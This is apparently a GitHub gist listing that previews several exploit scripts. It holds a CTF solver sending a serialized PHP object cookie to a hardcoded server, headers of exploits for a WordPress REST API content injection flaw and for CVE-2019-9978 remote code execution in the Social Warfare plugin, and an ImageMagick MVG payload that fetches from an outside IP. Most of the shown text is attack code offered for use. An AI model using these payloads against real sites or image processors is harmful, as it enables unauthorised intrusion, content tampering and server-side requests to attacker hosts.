budanthara
/ web1_tumctf.py
Created
October 2, 2016 16:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import re | |
| from urllib import quote_plus | |
| def main(): | |
| cookie = quote_plus('760463360e4919ca238d1566fc26661fa:1:{i:0;O:16:"GPLSourceBloater":1:{s:6:"source";s:8:"flag.php";}}') | |
| url = "http://104.154.70.126:10888/" | |
| req = requests.get(url, cookies=dict(todos=cookie)) | |
| print 'hxp{'+' '.join(re.findall(r'hxp{(.*?)}', req.text)[0].split(" "))+'}' |
budanthara
/ wordpress_content_injection.py
Last active
February 17, 2024 07:16
Wordpress content injection exploit by snoww0lf
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #! /usr/bin/env python | |
| """ | |
| Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html | |
| REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post | |
| Wordpress Version Affected: 4.7.0/4.7.1 | |
| 2017 - Coded by snoww0lf. | |
| """ | |
| import re |
budanthara
/ CVE-2019-9978.py
Created
May 12, 2019 07:21
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Title: RCE in Social Warfare Plugin Wordpress ( <=3D3.5.2 ) | |
| # Date: March, 2019 | |
| # Researcher: Luka Sikic | |
| # Exploit Author: hash3liZer | |
| # Download Link: https://wordpress.org/plugins/social-warfare/ | |
| # Reference: https://wpvulndb.com/vulnerabilities/9259?fbclid=3DIwAR2xLSnan=ccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM | |
| # Github: https://github.com/hash3liZer/CVE-2019-9978 | |
| # Version: <=3D 3.5.2 | |
| # CVE: CVE-2019-9978 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| push graphic-context | |
| viewbox 0 0 640 480 | |
| fill 'url(http://103.200.7.150:8070/wew)' | |
| pop graphic-context |
OlderNewer